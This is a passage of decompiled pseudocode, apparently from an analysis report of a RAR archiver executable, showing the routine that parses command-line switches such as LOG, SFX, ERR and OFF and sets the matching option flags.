				if (_t745 == 0) goto 0x50b25442;
				if (_t745 == 0) goto 0x50b25437;
				if (_t745 == 0) goto 0x50b25425;
				if (_t745 == 0) goto 0x50b25416;
				if (_t521 - 0x2f != 1) goto 0x50b26930;
				goto 0x50b25b65;
				_t918[0x1c5b] = 4;
				goto 0x50b26930;
				r15d = 3;
				_t918[0x1c5b] = r15d;
				goto 0x50b26930;
				_t918[0x1c5b] = 2;
				goto 0x50b26930;
				_t918[0x1c5b] = 1;
				goto 0x50b26930;
				_t747 =  *(__rdx + 4);
				if (_t747 != 0) goto 0x50b26930;
				E00007FF67FF650B5D5F4();
				if (_t747 == 0) goto 0x50b254d5;
				if (_t747 == 0) goto 0x50b254c4;
				if (_t747 == 0) goto 0x50b254ac;
				_t368 = _t364 - 0x39;
				if (_t747 == 0) goto 0x50b2549b;
				if (_t368 != 4) goto 0x50b26930;
				_t918[0x1c71] = dil;
				_t918[0x1c72] = dil;
				goto 0x50b26930;
				_t918[0x1c6b] = dil;
				goto 0x50b26930;
				_t918[0x1c71] = dil;
				_t918[0x1c72] = dil;
				goto 0x50b26930;
				_t918[0x1c71] = dil;
				goto 0x50b26930;
				_t918[0x1c71] = dil;
				goto 0x50b26930;
				if ( *(__rdx + 4) != 0) goto 0x50b25526;
				E00007FF67FF650B5D5F4();
				_t32 = _t1062 + 0x2c; // 0x2d
				if (_t368 == _t32) goto 0x50b2551f;
				if (_t368 == 0x4c) goto 0x50b25517;
				if (_t368 != 0x55) goto 0x50b25526;
				_t918[0x1c6d] = 1;
				goto 0x50b25526;
				_t918[0x1c6d] = 2;
				goto 0x50b25526;
				_t918[0x1c59] = dil;
				_t369 = E00007FF67FF650B5D600(__rdx + 2, L"AP");
				_t753 = _t369;
				if (_t753 != 0) goto 0x50b26930;
				_t918[0x1d0e] = dil;
				goto 0x50b26930;
				E00007FF67FF650B5D5F4();
				if (_t753 == 0) goto 0x50b25691;
				if (_t753 == 0) goto 0x50b25642;
				r15d = 3;
				if (_t753 == 0) goto 0x50b255df;
				if (_t753 == 0) goto 0x50b255ce;
				if (_t753 == 0) goto 0x50b26930;
				if (_t753 == 0) goto 0x50b255bd;
				if (_t753 == 0) goto 0x50b255ad;
				_t377 = _t369 - 0x42 - r15d - 0xfffffffffffffffb - r15d;
				if (_t753 == 0) goto 0x50b2559c;
				if (_t377 == r15d) goto 0x50b26930;
				goto 0x50b26633;
				_t918[0x1cf8] = dil;
				goto 0x50b26930;
				goto 0x50b25b65;
				_t918[0x1c59] = dil;
				goto 0x50b26930;
				_t918[0x1cf9] = dil;
				goto 0x50b26930;
				_t1127 = __rdx + 4;
				if ( *_t1127 != 0x2d) goto 0x50b25603;
				if ( *((intOrPtr*)(__rdx + 6)) != 0) goto 0x50b25603;
				_t918[0x1c78] = sil;
				goto 0x50b26930;
				E00007FF67FF650B5D5F4();
				r8d = 0x80;
				if (_t377 != 0x46) goto 0x50b25627;
				goto 0x50b25b6b;
				_t918[0x1c78] = dil;
				goto 0x50b25b6b;
				if ( *(__rdx + 4) != 0) goto 0x50b25659;
				_t52 = _t1077 + 1; // 0x1
				_t918[0x2140] = _t52;
				goto 0x50b26930;
				if ( *(__rdx + 4) != 0x31) goto 0x50b25673;
				_t55 = _t903 - 0x2f; // 0x2
				_t918[0x2140] = _t55;
				goto 0x50b26930;
				if ( *(__rdx + 4) != 0x32) goto 0x50b26930;
				r15d = 3;
				_t918[0x2140] = r15d;
				goto 0x50b26930;
				_t918[0x1c59] = dil;
				goto 0x50b26930;
				_t60 = _t1077 + 0x2b; // 0x2b
				r12d = _t60;
				_t62 = _t1105 - 0x2a; // 0x1
				sil =  *(__rdx + 2) == r12w;
				_t918[0x2549] = 0 + _t62;
				goto 0x50b26930;
				_t379 = E00007FF67FF650B24614(0, _t903, _t918, _t1127, _t1077, __r9, _t1126);
				goto 0x50b26930;
				_t762 =  *(__rdx + 2);
				if (_t762 != 0) goto 0x50b26633;
				_t918[0x1c59] = dil;
				goto 0x50b26930;
				if (_t762 == 0) goto 0x50b25d8a;
				if (_t762 == 0) goto 0x50b25b2a;
				if (_t762 == 0) goto 0x50b25af3;
				if (_t762 == 0) goto 0x50b25abb;
				_t763 = ( *_t1127 & 0x0000ffff) - 0x44 - 1;
				if (_t763 != 0) goto 0x50b26633;
				E00007FF67FF650B5D5F4();
				if (_t763 == 0) goto 0x50b25a99;
				if (_t763 == 0) goto 0x50b25927;
				if (_t763 == 0) goto 0x50b25884;
				if (_t763 == 0) goto 0x50b25855;
				if (_t763 == 0) goto 0x50b26930;
				if (_t763 == 0) goto 0x50b25791;
				if (_t379 - 0x2f == 1) goto 0x50b25772;
				_t918[0x1c51] = ( *(__rdx + 2) & 0x0000ffff) - 0x30;
				goto 0x50b25786;
				_t388 = E00007FF67FF650B5D5D0(_t903, __rdx + 4, _t1127);
				_t918[0x2546] = _t388;
				if (_t388 - 1 - 0x3f <= 0) goto 0x50b26930;
				goto 0x50b26633;
				_t904 = L"7z;ace;arj;bz2;cab;gz;jpeg;jpg;lha;lz;lzh;mp3;rar;taz;tgz;xz;z;zip;zipx";
				r8d = 0x400;
				_t1008 =  ==  ? _t904 : __rdx + 4;
				E00007FF67FF650B5A390(_t1085 + 0x60,  ==  ? _t904 : __rdx + 4,  &(_t918[2]));
				_t1063 = _t1085 + 0x60;
				if ( *((intOrPtr*)(_t1085 + 0x60)) == 0) goto 0x50b26930;
				_t1118 =  &(_t918[0x2e14]);
				r12d = 0x800;
				_t391 = E00007FF67FF650B6C330(0x3b, _t1063, __r9);
				_t919 = _t904;
				if (_t904 == 0) goto 0x50b257ea;
				 *_t904 = 0;
				if ( *_t1063 != 0x2e) goto 0x50b257f3;
				_t1064 = _t1063 + _t1079;
				E00007FF67FF650B7197C(_t391, _t1064, L"*?.");
				_t77 = _t1085 + 0x860; // 0x1060
				if (_t904 != 0) goto 0x50b25823;
				_t1102 = _t1064;
				E00007FF67FF650B1657C( *(__rdx + 2) & 0x0000ffff, _t904, _t77, _t1105, L"*.%ls", _t1102, _t1116);
				goto 0x50b2582e;
				E00007FF67FF650B5A390(_t77, _t1064, _t1105);
				_t78 = _t1085 + 0x860; // 0x1060
				_t395 = E00007FF67FF650B5A3F0(_t919, _t1118, _t78, _t1077, _t1079);
				if (_t919 == 0) goto 0x50b26930;
				_t79 = _t919 + 2; // 0x2
				_t1065 = _t79;
				if ( *_t1065 != 0) goto 0x50b257d2;
				goto 0x50b26930;
				E00007FF67FF650B5D5F4();
				if (_t395 != 0x53) goto 0x50b26930;
				if (_t1118[1] != 0) goto 0x50b26930;
				_t82 = _t904 - 0x52; // -82
				 *(_t919 + 0x6133) = dil;
				goto 0x50b26930;
				_t396 = E00007FF67FF650B5D5D0(_t904,  &(_t1118[1]), _t78);
				 *(_t919 + 0x10) = _t396;
				if (_t396 != 0) goto 0x50b258b1;
				E00007FF67FF650B5D5F4();
				goto 0x50b258e8;
				if ( *((intOrPtr*)(_t1118 + ((_t1065 | 0xffffffff) + 1) * 2)) != 0) goto 0x50b258b5;
				E00007FF67FF650B5D5F4();
				if (_t396 == 0x47) goto 0x50b258e4;
				if (_t396 == 0x4b) goto 0x50b258de;
				goto 0x50b258e8;
				goto 0x50b258e8;
				_t1017 =  *(_t919 + 0x10) << 0x14 << 0xa << 0x1e;
				 *(_t919 + 0x10) = _t1017;
				if (_t1017 - 0x40000000 > 0) goto 0x50b25905;
				if (E00007FF67FF650B24138(_t904, _t919) != 0) goto 0x50b26930;
				E00007FF67FF650B54598(0xe4c, _t82, _t919, _t1077, _t1079, _t1105);
				_t941 = _t904;
				E00007FF67FF650B283F0(_t941, _t1118, _t1105, _t1102, _t1111);
				 *(_t919 + 0x10) = 0x400000;
				goto 0x50b26930;
				_t1119 =  &(_t1118[1]);
				_t782 = ( *_t1119 & 0x0000ffff) - 0x2d;
				if (_t782 != 0) goto 0x50b2595b;
				_t920 = _t919 + 0x743c;
				_t96 = _t941 - 0x1d; // 0x10
				_t98 = _t941 - 0x2a; // 0x3
				r15d = _t98;
				 *_t920 = r15d;
				_t921 =  &(_t920[3]);
				if (_t782 != 0) goto 0x50b2594a;
				goto 0x50b26930;
				if (_t96 == 0) goto 0x50b26930;
				_t100 = _t1077 + 1; // 0x1
				_t663 = _t100;
				_t101 = _t1077 + 0x2b; // 0x2b
				r12d = _t101;
				_t102 = _t1077 + 3; // 0x3
				r15d = _t102;
				_t103 = _t1077 + 8; // 0x8
				r13d = _t103;
				 *((intOrPtr*)(_t1085 + 0x44)) = 0;
				 *((intOrPtr*)(_t1085 + 0x48)) = 0;
				if (E00007FF67FF650B59F44(_t941) == 0) goto 0x50b259a7;
				 *((intOrPtr*)(_t1085 + 0x44)) = E00007FF67FF650B5D5D0(_t904 - (_t1065 | 0xffffffff) + 1, _t1119, _t1118);
				goto 0x50b2599a;
				_t1120 = _t1119 + _t1079;
				if (E00007FF67FF650B59F44(_t1119) != 0) goto 0x50b25997;
				if ( *_t1120 != 0x3a) goto 0x50b259ea;
				 *((long long*)(_t1085 + 0x58)) = _t1120 + 2;
				if (E00007FF67FF650B59F44(_t1119) == 0) goto 0x50b259ea;
				_t1121 =  *((intOrPtr*)(_t1085 + 0x58));
				 *((intOrPtr*)(_t1085 + 0x48)) = E00007FF67FF650B5D5D0(_t1120 + 2, _t1121, _t1118);
				goto 0x50b259dd;
				_t408 = E00007FF67FF650B59F44(_t1121);
				_t788 = _t408;
				if (_t788 != 0) goto 0x50b259da;
				_t1123 = _t1121 + _t1079 + _t1079;
				E00007FF67FF650B5D5F4();
				if (_t788 == 0) goto 0x50b25a2d;
				if (_t788 == 0) goto 0x50b25a26;
				if (_t788 == 0) goto 0x50b25a21;
				if (_t788 == 0) goto 0x50b25a1c;
				if (_t788 == 0) goto 0x50b25a17;
				if (_t408 - 0x3f - _t663 - _t663 - 0xd != 2) goto 0x50b25a34;
				goto 0x50b25a37;
				goto 0x50b25a37;
				goto 0x50b25a37;
				goto 0x50b25a37;
				goto 0x50b25a37;
				goto 0x50b25a37;
				_t1022 = _t1111;
				_t547 =  *_t1123 & 0x0000ffff;
				r8d = 0xfffd;
				if ((r8w & (_t547 & 0x0000ffff) - r12w) != 0) goto 0x50b25a60;
				_t1124 = _t1123 + _t1079;
				if (_t547 != r12w) goto 0x50b25a5b;
				goto 0x50b25a62;
				goto 0x50b25a62;
				_t944 = _t1022 + _t1022 * 2;
				 *((intOrPtr*)(_t921 + 0x743c + _t944 * 4)) = _t663;
				 *((intOrPtr*)(_t921 + 0x7440 + (_t1022 + _t1022 * 2) * 4)) =  *((intOrPtr*)(_t1085 + 0x44));
				 *((intOrPtr*)(_t921 + 0x7444 + _t944 * 4)) =  *((intOrPtr*)(_t1085 + 0x48));
				if (( *_t1124 & 0x0000ffff) != 0) goto 0x50b25975;
				goto 0x50b26930;
				if (_t1124[2] == 0) goto 0x50b25aaa;
				if (_t1124[2] != 0x35) goto 0x50b25aaf;
				_t921[0x1c72] = sil;
				goto 0x50b26930;
				if (E00007FF67FF650B5D648( *_t1124 & 0x0000ffff, _t547, _t1022 + _t1022 * 2,  &(_t1124[1]), L"OG", _t1079) != 0) goto 0x50b26930;
				_t422 = E00007FF67FF650B382B4(_t663, _t739, _t1022 + _t1022 * 2, _t921, 0x50ba7a90,  &(_t1124[3]), _t1077);
				if (_t422 != 0) goto 0x50b26930;
				goto 0x50b26633;
				E00007FF67FF650B5D5F4();
				if (_t422 == 0) goto 0x50b25b19;
				if (_t422 != 0x42) goto 0x50b26930;
				_t921[0x1c71] = dil;
				goto 0x50b26930;
				_t921[0x1d0e] = dil;
				goto 0x50b26930;
				_t1068 =  &(_t1124[1]);
				r15d = 3;
				r8d = r15d;
				if (E00007FF67FF650B5D648(_t422, _t1124[1] & 0x0000ffff, _t1022 + _t1022 * 2, _t1068, L"LOG", _t1079) != 0) goto 0x50b25b75;
				_t908 =  &(_t1124[4]);
				_t1027 =  !=  ? _t908 : L"rar.log";
				r8d = 0x800;
				_t424 = E00007FF67FF650B5A390( &(_t921[0x184d]),  !=  ? _t908 : L"rar.log", _t1079);
				goto 0x50b26930;
				if (E00007FF67FF650B5D648(_t424, _t1124[1] & 0x0000ffff, _t908, _t1068, L"SND", _t1127) != 0) goto 0x50b25ba7;
				_t140 =  &(_t908[0x16]); // 0x2d
				_t142 =  &(_t908[0]); // 0x1
				sil = _t1124[4] == _t140;
				_t921[0x1c4f] = 0 + _t142;
				goto 0x50b26930;
				if (E00007FF67FF650B5D600(_t1068, L"ERR") != 0) goto 0x50b25bcf;
				_t144 =  &(_t908[0]); // 0x1
				_t921[0x1c4e] = _t144;
				_t427 = E00007FF67FF650B27D10(_t426, _t144);
				goto 0x50b26930;
				if (E00007FF67FF650B5D648(_t427, _t144, _t908, _t1068, L"EML", _t1127) != 0) goto 0x50b25bf8;
				goto 0x50b25b5a;
				if (E00007FF67FF650B5D600(_t1068, "M") != 0) goto 0x50b25c1a;
				_t921[0x1c6b] = dil;
				goto 0x50b26930;
				_t430 = E00007FF67FF650B5D600(_t1068, L"NUL");
				if (_t430 != 0) goto 0x50b25c39;
				_t921[0x1c4e] = r15d;
				goto 0x50b25bc5;
				E00007FF67FF650B5D5F4();
				if (_t430 != 0x44) goto 0x50b25cd0;
				_t150 = _t908 - 0x42; // -66
				_t723 = _t150;
				_t431 = _t1124[2] & 0x0000ffff;
				r15d = _t723;
				_t808 = _t431;
				if (_t808 == 0) goto 0x50b26930;
				_t152 = _t1079 - 1; // -67
				_t669 = _t152;
				E00007FF67FF650B5D5F4();
				if (_t808 == 0) goto 0x50b25cb7;
				if (_t808 == 0) goto 0x50b25cae;
				if (_t808 == 0) goto 0x50b25ca5;
				if (_t808 == 0) goto 0x50b25c9c;
				if (_t808 == 0) goto 0x50b25c8d;
				if (_t431 - 0x43 - _t669 - 0xa - _t723 - _t669 != 5) goto 0x50b25cbe;
				_t921[0x1c6b] = dil;
				goto 0x50b25cbe;
				_t921[0x1c4e] = _t723;
				E00007FF67FF650B27D10(_t431 - 0x43 - _t669 - 0xa - _t723 - _t669, _t723);
				goto 0x50b25cbe;
				_t921[0x1c55] = dil;
				goto 0x50b25cbe;
				_t921[0x1c55] = dil;
				goto 0x50b25cbe;
				_t921[0x1c55] = dil;
				goto 0x50b25cbe;
				_t921[0x1c55] = dil;
				r15d = r15d + _t669;
				if ((_t1124[_t1127] & 0x0000ffff) != 0) goto 0x50b25c61;
				goto 0x50b26930;
				if (E00007FF67FF650B5D648(_t1124[_t1127] & 0x0000ffff, _t723, _t908, _t1068, L"OFF", _t1127) != 0) goto 0x50b25d42;
				_t555 = _t1124[4] & 0x0000ffff;
				_t812 = _t555;
				if (_t812 == 0) goto 0x50b25d32;
				if (_t812 == 0) goto 0x50b25d32;
				if (_t812 == 0) goto 0x50b25d22;
				if (_t812 == 0) goto 0x50b25d16;
				if (_t555 - 0x2f != 1) goto 0x50b26930;
				_t921[0x2141] = 4;
				goto 0x50b26930;
				_t921[0x2141] = r15d;
				goto 0x50b26930;
				_t921[0x2141] = 2;
				goto 0x50b26930;
				_t921[0x2141] = 1;
				goto 0x50b26930;
				if (E00007FF67FF650B5D600(_t1068, L"VER") != 0) goto 0x50b25d64;
				_t921[0x1c56] = dil;
				goto 0x50b26930;
				_t1036 = L"FZ";
				_t441 = E00007FF67FF650B5D600(_t1068, _t1036);
				if (_t441 != 0) goto 0x50b26930;
				_t921[0x1c78] = dil;
				goto 0x50b26930;
				E00007FF67FF650B5D5F4();
				if (_t441 == 0x50) goto 0x50b25dda;
				_t817 = _t441 - 0x54;
				if (_t817 != 0) goto 0x50b26633;
				E00007FF67FF650B5D5F4();
				if (_t817 == 0) goto 0x50b25dc8;
				if (_t441 - 0x42 != 1) goto 0x50b26633;
				_t172 =  &(_t908[0]); // -65
				_t921[0x1c52] = _t172;
				goto 0x50b26930;
				r15d = 3;
				_t921[0x1c52] = r15d;
				goto 0x50b26930;
				_t921[0x184c] = dil;
				if (_t1124[2] == 0) goto 0x50b25e35;
				_t1069 = _t1068 | 0xffffffff;
				_t910 = _t1069 + 1;
				if ( *((intOrPtr*)(_t1124 + 4 + _t910 * 2)) != 0) goto 0x50b25df6;
				if (_t910 - 0x80 < 0) goto 0x50b25e16;
				_t180 = _t1036 - 0x1c; // 0x63
				E00007FF67FF650B110C0(_t180, 0x7f);
				E00007FF67FF650B57B24( &(_t921[0x180c]),  &(_t1124[2]), _t1127, _t1105); // executed
				_t1070 = _t1069 + 1;
				if (_t1124[_t1070] != 0) goto 0x50b25e26;
				goto 0x50b263f9;
				if (_t921[0x184c] != sil) goto 0x50b26930;
				E00007FF67FF650B5CE48(0, _t921[0x184c] - sil,  &(_t921[0x180c]));
				_t446 = E00007FF67FF650B28208("\n",  &(_t1124[2]),  &(_t921[0x180c]), _t1102, _t1061);
				goto 0x50b26930;
				if (0 - 0x55 > 0) goto 0x50b26612;
				if (0 == 0x55) goto 0x50b265fa;
				if (0 == 0x55) goto 0x50b2640a;
				if (0 == 0x55) goto 0x50b26393;
				if (0 == 0x55) goto 0x50b26331;
				if (0 == 0x55) goto 0x50b26218;
				if (0 == 0x55) goto 0x50b25f80;
				if (0xffffffffffffffad != 1) goto 0x50b26633;
				E00007FF67FF650B5D5F4();
				_t826 = _t446 - 0x4b;
				if (_t826 > 0) goto 0x50b25f16;
				if (_t826 == 0) goto 0x50b25f06;
				_t827 = _t446;
				if (_t827 == 0) goto 0x50b25ef5;
				if (_t827 == 0) goto 0x50b25ee9;
				if (_t827 == 0) goto 0x50b25ee1;
				if (_t827 == 0) goto 0x50b25ed8;
				_t828 = _t446 - 0x18 - 1;
				goto 0x50b25591;
				r9d = 0;
				_t188 = _t1102 + 1; // 0x1
				r8d = _t188;
				goto 0x50b25f54;
				r9d = 0;
				r8d = 0;
				goto 0x50b25f54;
				_t921[0x1d0e] = sil;
				goto 0x50b26930;
				_t921[0x1d0e] = dil;
				goto 0x50b26930;
				_t921[0x1c6c] = 1;
				goto 0x50b26930;
				if (_t828 == 0) goto 0x50b25f70;
				if (_t828 == 0) goto 0x50b25f65;
				if (_t828 == 0) goto 0x50b25f49;
				if (_t828 == 0) goto 0x50b25f38;
				r15d = 3;
				goto 0x50b25591;
				E00007FF67FF650B26C84(0, _t921, _t921,  &(_t1124[2]), _t1070, _t1077, _t1079, _t1077, _t1079);
				goto 0x50b26930;
				r9b = dil;
				r8b = dil;
				_t448 = E00007FF67FF650B26D7C(_t910, _t921, _t921,  &(_t1124[2]), _t1077, _t1079);
				goto 0x50b26930;
				r9d = 1;
				goto 0x50b25ee4;
				_t921[0x1c6c] = 2;
				goto 0x50b26930;
				r15d = 3;
				r8d = r15d;
				_t449 = E00007FF67FF650B5D648(_t448, _t1124[1] & 0x0000ffff, _t910, _t1124, L"SFX",  &(_t921[0x180c]));
				_t677 = _t1127 - 2;
				r12d = 0x800;
				if (_t449 != 0) goto 0x50b26001;
				_t911 =  &(_t1124[3]);
				_t1081 =  !=  ? _t911 : L"default.sfx";
				E00007FF67FF650B4511C(_t449, _t911, _t1081);
				if (_t911 != _t1081) goto 0x50b25fef;
				if (E00007FF67FF650B3345C() != 0) goto 0x50b25fef;
				 *(_t1085 + 0x20) = sil;
				r9b = dil;
				r8d = r12d;
				E00007FF67FF650B442A0(_t921, _t1081,  &(_t921[0x406]), _t1077, _t1081,  &(_t921[0x180c]));
				goto 0x50b26001;
				E00007FF67FF650B5A390( &(_t921[0x406]), _t1081, _t1105);
				if (E00007FF67FF650B59F44( &(_t921[0x406])) == 0) goto 0x50b26031;
				_t967 =  &(_t1124[1]);
				_t921[0x1c57] = _t921[0x1c57] | 0x00000002;
				_t455 = E00007FF67FF650B5D5D0(_t911, _t967, _t1081);
				_t921[0x1c58] = _t455;
				goto 0x50b26930;
				E00007FF67FF650B5D5F4();
				_t835 = _t455;
				if (_t835 == 0) goto 0x50b2620d;
				if (_t835 == 0) goto 0x50b26202;
				if (_t835 == 0) goto 0x50b2612d;
				if (_t835 == 0) goto 0x50b2611b;
				if (_t835 == 0) goto 0x50b2610f;
				if (_t835 == 0) goto 0x50b260e9;
				if (_t835 == 0) goto 0x50b260c2;
				if (_t835 == 0) goto 0x50b2609b;
				if (_t455 - 0x17 - _t677 - _t677 - 4 - r15d - _t677 != 9) goto 0x50b26930;
				_t205 = _t967 - 0x1d; // 0x10
				_t206 = _t967 - 0x25; // 0x8
				r13d = _t206;
				_t464 =  ==  ? r13d : _t205;
				_t921[0x1c57] = _t921[0x1c57] | ( ==  ? r13d : _t205);
				goto 0x50b26930;
				if (E00007FF67FF650B59F44(_t967) == 0) goto 0x50b26930;
				E00007FF67FF650B5D580(_t911,  &(_t1124[2]));
				_t921[0x1d0c] = _t911;
				goto 0x50b26930;
				if (E00007FF67FF650B59F44( &(_t1124[2])) == 0) goto 0x50b26930;
				_t468 = E00007FF67FF650B5D580(_t911,  &(_t1124[2]));
				_t921[0x1d0a] = _t911;
				goto 0x50b26930;
				_t469 = E00007FF67FF650B27D08(_t468);
				_t912 =  &(_t1124[2]);
				_t1044 =  !=  ? _t912 : L"stdin";
				goto 0x50b25b6b;
				_t921[0x1c57] = _t921[0x1c57] | 0x00000004;
				goto 0x50b26930;
				r13d = 8;
				_t921[0x1c57] = _t921[0x1c57] | r13d;
				goto 0x50b26930;
				r12b = sil;
				E00007FF67FF650B5D5F4();
				if (_t469 == 0x41) goto 0x50b26171;
				if (_t469 == 0x46) goto 0x50b2616a;
				if (_t469 == 0x4f) goto 0x50b26163;
				if (_t469 == 0x55) goto 0x50b2615e;
				E00007FF67FF650B23F64(_t912, _t921, _t1124, _t1105);
				goto 0x50b261f2;
				goto 0x50b26173;
				goto 0x50b26173;
				goto 0x50b26173;
				_t731 = _t677;
				if (_t1124[3] != 0) goto 0x50b26194;
				_t921[0x100b] = _t731;
				_t921[0x100a] = _t731;
				_t921[0x1009] = _t731;
				_t921[0x1008] = _t731;
				goto 0x50b261f2;
				if (r12b != 0) goto 0x50b261f2;
				_t471 = r15d;
				E00007FF67FF650B5D5F4();
				if (_t471 == 0x43) goto 0x50b261e2;
				if (_t471 == 0x47) goto 0x50b261da;
				if (_t471 == 0x4c) goto 0x50b261d2;
				if (_t471 == 0x52) goto 0x50b261ca;
				_t972 = _t921;
				_t472 = E00007FF67FF650B23F64(_t912, _t921, _t1124, _t1105);
				r12b = dil;
				goto 0x50b261e8;
				_t921[0x100b] = _t731;
				goto 0x50b261e8;
				_t921[0x1009] = _t731;
				goto 0x50b261e8;
				_t921[0x100a] = _t731;
				goto 0x50b261e8;
				_t921[0x1008] = _t731;
				r15d = r15d + _t677;
				if (_t1124[_t1127] != 0) goto 0x50b26194;
				_t473 = E00007FF67FF650B27D18(_t472, _t921[0x100b]);
				goto 0x50b26930;
				_t921[0x1c57] = 0;
				goto 0x50b26930;
				_t921[0x1c57] = _t921[0x1c57] | _t677;
				goto 0x50b26930;
				E00007FF67FF650B5D5F4();
				if (_t473 == 0) goto 0x50b26321;
				if (_t473 == 0x2d) goto 0x50b26311;
				if (_t473 == 0x30) goto 0x50b262ff;
				if (_t473 == 0x49) goto 0x50b26291;
				if (_t473 == 0x52) goto 0x50b26271;
				if (_t473 != 0x56) goto 0x50b26930;
				_t240 = _t972 - 0x37; // -10
				r9d = _t240;
				_t921[0x1c54] = E00007FF67FF650B243A8(_t912, _t921, _t1077,  &(_t1124[2]));
				goto 0x50b26930;
				r9d = 0xfffffffd;
				_t921[0x1c53] = E00007FF67FF650B243A8(_t912, _t921, _t1077,  &(_t1124[2]));
				goto 0x50b26930;
				_t476 = E00007FF67FF650B5D5D0(_t912,  &(_t1124[2]), _t1124);
				_t921[0x1c6f] = _t476;
				if (_t476 - 0xf <= 0) goto 0x50b262b0;
				E00007FF67FF650B23F64(_t912, _t921, _t1124,  &(_t1124[2]));
				E00007FF67FF650B6C330(0x3a,  &(_t1124[2]), _t1102);
				if (_t912 == 0) goto 0x50b262ef;
				_t248 =  &(_t912[1]); // 0x2
				_t479 = E00007FF67FF650B5D5D0(_t912, _t248, _t1124);
				_t921[0x1c70] = _t479;
				if (_t479 - 0x3e8 <= 0) goto 0x50b262e4;
				_t1050 = _t1124;
				E00007FF67FF650B5AC94(E00007FF67FF650B23F64(_t912, _t921, _t1050,  &(_t1124[2])), _t921[0x1c70]);
				_t482 = E00007FF67FF650B5AE2C(_t921[0x1c6f], _t912, _t921, _t921);
				goto 0x50b26930;
				r15d = 3;
				_t921[0x1c5c] = r15d;
				goto 0x50b26930;
				_t921[0x1c5c] = 1;
				goto 0x50b26930;
				_t921[0x1c5c] = 2;
				goto 0x50b26930;
				E00007FF67FF650B5D5F4();
				if (_t482 != 0x4f) goto 0x50b26633;
				E00007FF67FF650B5D5F4();
				if (_t482 == 0) goto 0x50b26383;
				_t257 = _t1077 + 0x2b; // 0x2b
				r12d = _t257;
				if (_t482 == r12d) goto 0x50b26373;
				_t258 = _t1077 + 0x2d; // 0x2d
				if (_t482 != _t258) goto 0x50b26633;
				_t921[0x806] = 0;
				goto 0x50b26930;
				_t921[0x806] = 2;
				goto 0x50b26930;
				_t921[0x806] = 1;
				goto 0x50b26930;
				if (_t1124[1] != 0) goto 0x50b263b8;
				_t1100 =  &(_t921[0x180c]);
				E00007FF67FF650B5CE48(0, _t1124[1],  &(_t921[0x180c]));
				goto 0x50b25e59;
				_t1071 = _t1070 | 0xffffffff;
				_t914 = _t1071 + 1;
				if ( *((intOrPtr*)(_t1124 + 2 + _t914 * 2)) != 0) goto 0x50b263bf;
				if (_t914 - 0x80 < 0) goto 0x50b263df;
				_t267 = _t1050 - 0x1c; // 0x63
				E00007FF67FF650B110C0(_t267, 0x7f);
				E00007FF67FF650B57B24( &(_t921[0x180c]),  &(_t1124[1]),  &(_t921[0x180c]));
				if (_t1124[_t1071 + 1] != 0) goto 0x50b263ef;
				_t486 = E00007FF67FF650B57B7C(_t267, 1, _t739, _t1124, _t1071 + 1 + _t1071 + 1, _t1071 + 1);
				goto 0x50b26930;
				E00007FF67FF650B5D5F4();
				_t869 = _t486 - 0x4c;
				if (_t869 > 0) goto 0x50b26561;
				if (_t869 == 0) goto 0x50b26536;
				_t870 = _t486;
				if (_t870 == 0) goto 0x50b26527;
				if (_t870 == 0) goto 0x50b26517;
				_t274 = _t1077 + 2; // 0x2
				_t734 = _t274;
				if (_t870 == 0) goto 0x50b2650c;
				if (_t870 == 0) goto 0x50b264fb;
				if (_t870 == 0) goto 0x50b264ea;
				_t871 = _t486 - 0x2b - _t734 - 0x11 - 1;
				if (_t871 != 0) goto 0x50b26633;
				if (_t871 == 0) goto 0x50b264b8;
				_t276 = _t1077 + 3; // 0x3
				r15d = _t276;
				if (_t871 == 0) goto 0x50b264b8;
				if (_t871 == 0) goto 0x50b264ab;
				if (_t871 == 0) goto 0x50b264a3;
				if (_t871 == 0) goto 0x50b2649a;
				if ((_t1124[2] & 0x0000ffff) - 0x2d - r15d - 0xffffffffffffffff != 1) goto 0x50b264ab;
				_t921[0x1c74] = 4;
				_t921[0x254a] = dil;
				goto 0x50b264be;
				_t921[0x1c74] = r15d;
				goto 0x50b264be;
				_t921[0x1c74] = _t734;
				goto 0x50b264be;
				_t921[0x1c74] = 1;
				goto 0x50b264be;
				_t921[0x1c74] = 0;
				E00007FF67FF650B6C330(0x3a,  &(_t1124[2]), _t1102);
				if (_t914 == 0) goto 0x50b26930;
				_t284 = _t914 + 2; // 0x2
				_t488 = E00007FF67FF650B5D580(_t914, _t284);
				_t921[0x1c76] = _t914;
				goto 0x50b26930;
				_t921[0x1c6e] = dil;
				goto 0x50b26930;
				_t921[0x1cf9] = dil;
				goto 0x50b26930;
				_t921[0x1c50] = _t734;
				goto 0x50b26930;
				_t921[0x1c50] = 1;
				goto 0x50b26930;
				_t921[0x1c50] = 4;
				goto 0x50b26930;
				_t921[0x1c6e] = dil;
				E00007FF67FF650B5D5F4();
				_t874 = _t488 - 0x41;
				if (_t874 != 0) goto 0x50b26930;
				_t921[0x1c6e] = dil;
				goto 0x50b26930;
				if (_t874 == 0) goto 0x50b265d8;
				if (_t874 == 0) goto 0x50b265b3;
				if (_t874 == 0) goto 0x50b265a1;
				if (_t874 == 0) goto 0x50b26590;
				if (0xffffffffffffffe7 != 4) goto 0x50b26633;
				_t921[0x1c6e] = dil;
				goto 0x50b26930;
				_t921[0x1cf9] = dil;
				goto 0x50b26930;
				r15d = 3;
				_t921[0x1c50] = r15d;
				goto 0x50b26930;
				r12d = 0x800;
				r8d = r12d;
				_t489 = E00007FF67FF650B5A390( &(_t921[0x807]),  &(_t1124[2]),  &(_t921[0x180c]));
				goto 0x50b26707;
				E00007FF67FF650B5D5F4();
				if (_t489 != 0x49) goto 0x50b26930;
				_t921[0x1c71] = dil;
				goto 0x50b26930;
				_t877 = _t1124[1];
				if (_t877 != 0) goto 0x50b26633;
				_t921[0x1c5a] = dil;
				goto 0x50b26930;
				if (_t877 == 0) goto 0x50b26714;
				if (_t877 == 0) goto 0x50b266ed;
				if (_t877 == 0) goto 0x50b2666d;
				if (_t877 == 0) goto 0x50b2665c;
				if ((_t1124[2] & 0x0000ffff) - 0x53 == 1) goto 0x50b26643;
				E00007FF67FF650B23F64(_t914, _t921, _t1124,  &(_t921[0x180c]));
				goto 0x50b26930;
				_t915 =  &(_t1124[1]);
				goto 0x50b25b5e;
				_t921[0x1c6b] = dil;
				goto 0x50b26930;
				_t1073 =  &(_t1124[1]);
				if ( *_t1073 == 0) goto 0x50b26930;
				E00007FF67FF650B5D5F4();
				_t737 =  ==  ? 0xb6d0 : 0xb610;
				if ( *_t1073 != 0x40) goto 0x50b266dd;
				_t882 = E00007FF67FF650B4498C(_t915, _t1124);
				if (_t882 != 0) goto 0x50b266dd;
